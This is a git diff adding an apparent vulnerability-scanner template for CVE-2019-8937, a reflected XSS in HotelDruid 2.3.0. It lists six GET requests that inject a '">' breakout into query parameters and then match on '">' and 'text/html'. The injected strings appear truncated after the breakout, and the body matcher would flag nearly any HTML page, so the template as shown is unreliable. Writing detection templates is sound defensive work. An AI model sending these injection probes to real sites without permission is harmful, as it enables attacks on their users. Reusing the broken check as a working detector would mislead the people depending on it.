diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml new file mode 100644 index 0000000000..3e7aef68bc --- /dev/null +++ b/cves/2019/CVE-2019-8937.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-8937 + +info: + name: HotelDruid 2.3.0 - XSS + author: Borna Nematzadeh + severity: medium + refrense: https://www.exploit-db.com/exploits/46429 + tags: cve,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671">' + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + words: + - "text/html" + part: header \ No newline at end of file